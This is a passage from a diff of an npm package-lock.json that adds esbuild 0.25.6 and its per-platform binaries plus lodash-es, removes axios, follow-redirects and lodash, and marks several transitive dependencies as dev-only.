"node_modules/@esbuild/linux-s390x": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.6.tgz", + "integrity": "sha512-9N1LsTwAuE9oj6lHMyyAM+ucxGiVnEqUdp4v7IaMmrwb06ZTEVCIs3oPPplVsnjPfyjmxwHxHMF8b6vzUVAUGw==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.6.tgz", + "integrity": "sha512-A6bJB41b4lKFWRKNrWoP2LHsjVzNiaurf7wyj/XtFNTsnPuxwEBWHLty+ZE0dWBKuSK1fvKgrKaNjBS7qbFKig==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/netbsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.6.tgz", + "integrity": "sha512-IjA+DcwoVpjEvyxZddDqBY+uJ2Snc6duLpjmkXm/v4xuS3H+3FkLZlDm9ZsAbF9rsfP3zeA0/ArNDORZgrxR/Q==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/netbsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.6.tgz", + "integrity": "sha512-dUXuZr5WenIDlMHdMkvDc1FAu4xdWixTCRgP7RQLBOkkGgwuuzaGSYcOpW4jFxzpzL1ejb8yF620UxAqnBrR9g==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/openbsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.6.tgz", + "integrity": "sha512-l8ZCvXP0tbTJ3iaqdNf3pjaOSd5ex/e6/omLIQCVBLmHTlfXW3zAxQ4fnDmPLOB1x9xrcSi/xtCWFwCZRIaEwg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/openbsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.6.tgz", + "integrity": "sha512-hKrmDa0aOFOr71KQ/19JC7az1P0GWtCN1t2ahYAf4O007DHZt/dW8ym5+CUdJhQ/qkZmI1HAF8KkJbEFtCL7gw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/openharmony-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openharmony-arm64/-/openharmony-arm64-0.25.6.tgz", + "integrity": "sha512-+SqBcAWoB1fYKmpWoQP4pGtx+pUUC//RNYhFdbcSA16617cchuryuhOCRpPsjCblKukAckWsV+aQ3UKT/RMPcA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openharmony" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/sunos-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.6.tgz", + "integrity": "sha512-dyCGxv1/Br7MiSC42qinGL8KkG4kX0pEsdb0+TKhmJZgCUDBGmyo1/ArCjNGiOLiIAgdbWgmWgib4HoCi5t7kA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.6.tgz", + "integrity": "sha512-42QOgcZeZOvXfsCBJF5Afw73t4veOId//XD3i+/9gSkhSV6Gk3VPlWncctI+JcOyERv85FUo7RxuxGy+z8A43Q==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-ia32": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.6.tgz", + "integrity": "sha512-4AWhgXmDuYN7rJI6ORB+uU9DHLq/erBbuMoAuB4VWJTu5KtCgcKYPynF0YI1VkBNuEfjNlLrFr9KZPJzrtLkrQ==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.6.tgz", + "integrity": "sha512-NgJPHHbEpLQgDH2MjQu90pzW/5vvXIZ7KOnPyNBm92A6WgZ/7b6fJyUBjoumLqeOQQGqY2QjQxRo97ah4Sj0cA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, "node_modules/@jest/diff-sequences": { "version": "30.0.1", "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", @@ -382,6 +824,16 @@ "integrity": "sha512-/BHF5HAx3em7/KkzVKm3LrsD6HZAXuXO1AJZQ3cRRBZj4oHZDviWPYu0aEplAqDFNHZPW6d3G7KN+ONcCCC7pw==", "dev": true }, + "node_modules/@types/lodash-es": { + "version": "4.17.12", + "resolved": "https://registry.npmjs.org/@types/lodash-es/-/lodash-es-4.17.12.tgz", + "integrity": "sha512-0NgftHUcV4v34VhXm8QBSftKVXtbkBG3ViCjs6+eJ5a6y6Mi/jiFGPc1sC7QK+9BFhWrURE3EOggmWaSxL9OzQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/lodash": "*" + } + }, "node_modules/@types/mustache": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.1.2.tgz", @@ -500,18 +952,8 @@ "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "node_modules/axios": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.10.0.tgz", - "integrity": "sha512-/1xYAC4MP/HEG+3duIhFr4ZQXR4sQXOIe+o6sdqzeykGLx6Upp/1p8MHqhINOvGeP7xyNHe7tsiJByc4SSVUxw==", - "license": "MIT", - "dependencies": { - "follow-redirects": "^1.15.6", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } + "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=", + "dev": true }, "node_modules/b4a": { "version": "1.6.7", @@ -613,6 +1055,7 @@ "version": "1.0.2", "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "dev": true, "license": "MIT", "dependencies": { "es-errors": "^1.3.0", @@ -660,6 +1103,7 @@ "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "dev": true, "dependencies": { "delayed-stream": "~1.0.0" }, @@ -697,6 +1141,7 @@ "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", + "dev": true, "engines": { "node": ">=0.4.0" } @@ -705,6 +1150,7 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "dev": true, "license": "MIT", "dependencies": { "call-bind-apply-helpers": "^1.0.1", @@ -729,6 +1175,7 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "dev": true, "license": "MIT", "engines": { "node": ">= 0.4" @@ -738,6 +1185,7 @@ "version": "1.3.0", "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "dev": true, "license": "MIT", "engines": { "node": ">= 0.4" @@ -747,6 +1195,7 @@ "version": "1.1.1", "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "dev": true, "license": "MIT", "dependencies": { "es-errors": "^1.3.0" @@ -759,6 +1208,7 @@ "version": "2.1.0", "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "dev": true, "license": "MIT", "dependencies": { "es-errors": "^1.3.0", @@ -770,6 +1220,48 @@ "node": ">= 0.4" } }, + "node_modules/esbuild": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.6.tgz", + "integrity": "sha512-GVuzuUwtdsghE3ocJ9Bs8PNoF13HNQ5TXbEi2AhvVb8xU1Iwt9Fos9FEamfoee+u/TOsn7GUWc04lz46n2bbTg==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" + }, + "engines": { + "node": ">=18" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.25.6", + "@esbuild/android-arm": "0.25.6", + "@esbuild/android-arm64": "0.25.6", + "@esbuild/android-x64": "0.25.6", + "@esbuild/darwin-arm64": "0.25.6", + "@esbuild/darwin-x64": "0.25.6", + "@esbuild/freebsd-arm64": "0.25.6", + "@esbuild/freebsd-x64": "0.25.6", + "@esbuild/linux-arm": "0.25.6", + "@esbuild/linux-arm64": "0.25.6", + "@esbuild/linux-ia32": "0.25.6", + "@esbuild/linux-loong64": "0.25.6", + "@esbuild/linux-mips64el": "0.25.6", + "@esbuild/linux-ppc64": "0.25.6", + "@esbuild/linux-riscv64": "0.25.6", + "@esbuild/linux-s390x": "0.25.6", + "@esbuild/linux-x64": "0.25.6", + "@esbuild/netbsd-arm64": "0.25.6", + "@esbuild/netbsd-x64": "0.25.6", + "@esbuild/openbsd-arm64": "0.25.6", + "@esbuild/openbsd-x64": "0.25.6", + "@esbuild/openharmony-arm64": "0.25.6", + "@esbuild/sunos-x64": "0.25.6", + "@esbuild/win32-arm64": "0.25.6", + "@esbuild/win32-ia32": "0.25.6", + "@esbuild/win32-x64": "0.25.6" + } + }, "node_modules/escape-string-regexp": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", @@ -798,29 +1290,11 @@ "node": ">=8" } }, - "node_modules/follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/RubenVerborgh" - } - ], - "engines": { - "node": ">=4.0" - }, - "peerDependenciesMeta": { - "debug": { - "optional": true - } - } - }, "node_modules/form-data": { "version": "4.0.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", + "dev": true, "license": "MIT", "dependencies": { "asynckit": "^0.4.0", @@ -837,6 +1311,7 @@ "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "dev": true, "license": "MIT", "funding": { "url": "https://github.com/sponsors/ljharb" @@ -846,6 +1321,7 @@ "version": "1.3.0", "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "dev": true, "license": "MIT", "dependencies": { "call-bind-apply-helpers": "^1.0.2", @@ -870,6 +1346,7 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "dev": true, "license": "MIT", "dependencies": { "dunder-proto": "^1.0.1", @@ -883,6 +1360,7 @@ "version": "1.2.0", "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "dev": true, "license": "MIT", "engines": { "node": ">= 0.4" @@ -911,6 +1389,7 @@ "version": "1.1.0", "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "dev": true, "license": "MIT", "engines": { "node": ">= 0.4" @@ -923,6 +1402,7 @@ "version": "1.0.2", "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "dev": true, "license": "MIT", "dependencies": { "has-symbols": "^1.0.3" @@ -938,6 +1418,7 @@ "version": "2.0.2", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "dev": true, "license": "MIT", "dependencies": { "function-bind": "^1.1.2" @@ -1133,15 +1614,17 @@ "node": ">=18.0.0" } }, - "node_modules/lodash": { + "node_modules/lodash-es": { "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" }, "node_modules/math-intrinsics": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "dev": true, "license": "MIT", "engines": { "node": ">= 0.4" @@ -1178,6 +1661,7 @@ "version": "1.49.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", + "dev": true, "engines": { "node": ">= 0.6" } @@ -1186,6 +1670,7 @@ "version": "2.1.32", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", + "dev": true, "dependencies": { "mime-db": "1.49.0" }, @@ -1294,11 +1779,6 @@ "dev": true, "license": "ISC" }, - "node_modules/proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, "node_modules/pump": { "version": "3.0.3", "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", @@ -1562,6 +2042,188 @@ "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", "dev": true }, + "@esbuild/aix-ppc64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.6.tgz", + "integrity": "sha512-ShbM/3XxwuxjFiuVBHA+d3j5dyac0aEVVq1oluIDf71hUw0aRF59dV/efUsIwFnR6m8JNM2FjZOzmaZ8yG61kw==", + "dev": true, + "optional": true + }, + "@esbuild/android-arm": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.6.tgz", + "integrity": "sha512-S8ToEOVfg++AU/bHwdksHNnyLyVM+eMVAOf6yRKFitnwnbwwPNqKr3srzFRe7nzV69RQKb5DgchIX5pt3L53xg==", + "dev": true, + "optional": true + }, + "@esbuild/android-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.6.tgz", + "integrity": "sha512-hd5zdUarsK6strW+3Wxi5qWws+rJhCCbMiC9QZyzoxfk5uHRIE8T287giQxzVpEvCwuJ9Qjg6bEjcRJcgfLqoA==", + "dev": true, + "optional": true + }, + "@esbuild/android-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.6.tgz", + "integrity": "sha512-0Z7KpHSr3VBIO9A/1wcT3NTy7EB4oNC4upJ5ye3R7taCc2GUdeynSLArnon5G8scPwaU866d3H4BCrE5xLW25A==", + "dev": true, + "optional": true + }, + "@esbuild/darwin-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.6.tgz", + "integrity": "sha512-FFCssz3XBavjxcFxKsGy2DYK5VSvJqa6y5HXljKzhRZ87LvEi13brPrf/wdyl/BbpbMKJNOr1Sd0jtW4Ge1pAA==", + "dev": true, + "optional": true + }, + "@esbuild/darwin-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.6.tgz", + "integrity": "sha512-GfXs5kry/TkGM2vKqK2oyiLFygJRqKVhawu3+DOCk7OxLy/6jYkWXhlHwOoTb0WqGnWGAS7sooxbZowy+pK9Yg==", + "dev": true, + "optional": true + }, + "@esbuild/freebsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.6.tgz", + "integrity": "sha512-aoLF2c3OvDn2XDTRvn8hN6DRzVVpDlj2B/F66clWd/FHLiHaG3aVZjxQX2DYphA5y/evbdGvC6Us13tvyt4pWg==", + "dev": true, + "optional": true + }, + "@esbuild/freebsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.6.tgz", + "integrity": "sha512-2SkqTjTSo2dYi/jzFbU9Plt1vk0+nNg8YC8rOXXea+iA3hfNJWebKYPs3xnOUf9+ZWhKAaxnQNUf2X9LOpeiMQ==", + "dev": true, + "optional": true + }, + "@esbuild/linux-arm": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.6.tgz", + "integrity": "sha512-SZHQlzvqv4Du5PrKE2faN0qlbsaW/3QQfUUc6yO2EjFcA83xnwm91UbEEVx4ApZ9Z5oG8Bxz4qPE+HFwtVcfyw==", + "dev": true, + "optional": true + }, + "@esbuild/linux-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.6.tgz", + "integrity": "sha512-b967hU0gqKd9Drsh/UuAm21Khpoh6mPBSgz8mKRq4P5mVK8bpA+hQzmm/ZwGVULSNBzKdZPQBRT3+WuVavcWsQ==", + "dev": true, + "optional": true + }, + "@esbuild/linux-ia32": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.6.tgz", + "integrity": "sha512-aHWdQ2AAltRkLPOsKdi3xv0mZ8fUGPdlKEjIEhxCPm5yKEThcUjHpWB1idN74lfXGnZ5SULQSgtr5Qos5B0bPw==", + "dev": true, + "optional": true + }, + "@esbuild/linux-loong64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.6.tgz", + "integrity": "sha512-VgKCsHdXRSQ7E1+QXGdRPlQ/e08bN6WMQb27/TMfV+vPjjTImuT9PmLXupRlC90S1JeNNW5lzkAEO/McKeJ2yg==", + "dev": true, + "optional": true + }, + "@esbuild/linux-mips64el": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.6.tgz", + "integrity": "sha512-WViNlpivRKT9/py3kCmkHnn44GkGXVdXfdc4drNmRl15zVQ2+D2uFwdlGh6IuK5AAnGTo2qPB1Djppj+t78rzw==", + "dev": true, + "optional": true + }, + "@esbuild/linux-ppc64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.6.tgz", + "integrity": "sha512-wyYKZ9NTdmAMb5730I38lBqVu6cKl4ZfYXIs31Baf8aoOtB4xSGi3THmDYt4BTFHk7/EcVixkOV2uZfwU3Q2Jw==", + "dev": true, + "optional": true + }, + "@esbuild/linux-riscv64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.6.tgz", + "integrity": "sha512-KZh7bAGGcrinEj4qzilJ4hqTY3Dg2U82c8bv+e1xqNqZCrCyc+TL9AUEn5WGKDzm3CfC5RODE/qc96OcbIe33w==", + "dev": true, + "optional": true + }, + "@esbuild/linux-s390x": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.6.tgz", + "integrity": "sha512-9N1LsTwAuE9oj6lHMyyAM+ucxGiVnEqUdp4v7IaMmrwb06ZTEVCIs3oPPplVsnjPfyjmxwHxHMF8b6vzUVAUGw==", + "dev": true, + "optional": true + }, + "@esbuild/linux-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.6.tgz", + "integrity": "sha512-A6bJB41b4lKFWRKNrWoP2LHsjVzNiaurf7wyj/XtFNTsnPuxwEBWHLty+ZE0dWBKuSK1fvKgrKaNjBS7qbFKig==", + "dev": true, + "optional": true + }, + "@esbuild/netbsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.6.tgz", + "integrity": "sha512-IjA+DcwoVpjEvyxZddDqBY+uJ2Snc6duLpjmkXm/v4xuS3H+3FkLZlDm9ZsAbF9rsfP3zeA0/ArNDORZgrxR/Q==", + "dev": true, + "optional": true + }, + "@esbuild/netbsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.6.tgz", + "integrity": "sha512-dUXuZr5WenIDlMHdMkvDc1FAu4xdWixTCRgP7RQLBOkkGgwuuzaGSYcOpW4jFxzpzL1ejb8yF620UxAqnBrR9g==", + "dev": true, + "optional": true + }, + "@esbuild/openbsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.6.tgz", + "integrity": "sha512-l8ZCvXP0tbTJ3iaqdNf3pjaOSd5ex/e6/omLIQCVBLmHTlfXW3zAxQ4fnDmPLOB1x9xrcSi/xtCWFwCZRIaEwg==", + "dev": true, + "optional": true + }, + "@esbuild/openbsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.6.tgz", + "integrity": "sha512-hKrmDa0aOFOr71KQ/19JC7az1P0GWtCN1t2ahYAf4O007DHZt/dW8ym5+CUdJhQ/qkZmI1HAF8KkJbEFtCL7gw==", + "dev": true, + "optional": true + }, + "@esbuild/openharmony-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openharmony-arm64/-/openharmony-arm64-0.25.6.tgz", + "integrity": "sha512-+SqBcAWoB1fYKmpWoQP4pGtx+pUUC//RNYhFdbcSA16617cchuryuhOCRpPsjCblKukAckWsV+aQ3UKT/RMPcA==", + "dev": true, + "optional": true + }, + "@esbuild/sunos-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.6.tgz", + "integrity": "sha512-dyCGxv1/Br7MiSC42qinGL8KkG4kX0pEsdb0+TKhmJZgCUDBGmyo1/ArCjNGiOLiIAgdbWgmWgib4HoCi5t7kA==", + "dev": true, + "optional": true + }, + "@esbuild/win32-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.6.tgz", + "integrity": "sha512-42QOgcZeZOvXfsCBJF5Afw73t4veOId//XD3i+/9gSkhSV6Gk3VPlWncctI+JcOyERv85FUo7RxuxGy+z8A43Q==", + "dev": true, + "optional": true + }, + "@esbuild/win32-ia32": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.6.tgz", + "integrity": "sha512-4AWhgXmDuYN7rJI6ORB+uU9DHLq/erBbuMoAuB4VWJTu5KtCgcKYPynF0YI1VkBNuEfjNlLrFr9KZPJzrtLkrQ==", + "dev": true, + "optional": true + }, + "@esbuild/win32-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.6.tgz", + "integrity": "sha512-NgJPHHbEpLQgDH2MjQu90pzW/5vvXIZ7KOnPyNBm92A6WgZ/7b6fJyUBjoumLqeOQQGqY2QjQxRo97ah4Sj0cA==", + "dev": true, + "optional": true + }, "@jest/diff-sequences": { "version": "30.0.1", "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", @@ -1805,6 +2467,15 @@ "integrity": "sha512-/BHF5HAx3em7/KkzVKm3LrsD6HZAXuXO1AJZQ3cRRBZj4oHZDviWPYu0aEplAqDFNHZPW6d3G7KN+ONcCCC7pw==", "dev": true }, + "@types/lodash-es": { + "version": "4.17.12", + "resolved": "https://registry.npmjs.org/@types/lodash-es/-/lodash-es-4.17.12.tgz", + "integrity": "sha512-0NgftHUcV4v34VhXm8QBSftKVXtbkBG3ViCjs6+eJ5a6y6Mi/jiFGPc1sC7QK+9BFhWrURE3EOggmWaSxL9OzQ==", + "dev": true, + "requires": { + "@types/lodash": "*" + } + }, "@types/mustache": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.1.2.tgz", @@ -1908,17 +2579,8 @@ "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "axios": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.10.0.tgz", - "integrity": 